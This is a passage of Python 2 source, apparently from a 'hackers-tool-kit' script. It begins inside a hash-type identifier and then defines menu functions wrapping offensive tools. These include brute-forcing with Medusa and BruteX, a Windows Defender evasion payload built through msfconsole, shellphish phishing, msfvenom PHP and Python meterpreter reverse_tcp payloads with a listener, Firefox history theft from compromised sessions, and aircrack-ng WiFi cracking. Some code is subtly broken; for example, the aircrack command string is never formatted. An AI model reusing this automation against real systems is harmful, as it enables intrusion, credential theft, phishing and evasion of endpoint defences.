jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + + +#NANO START# +#----------# +def nano(): + print "opening nano in \033[93m/root/\033[0m folder" + os.system("sleep 2") + os.system("cd /root/ && nano") +#--------# +#NANO END# + + +#UPDATE HACKERS-TOOL-KIT START# +#-----------------------------# +def update(): + os.system("cd 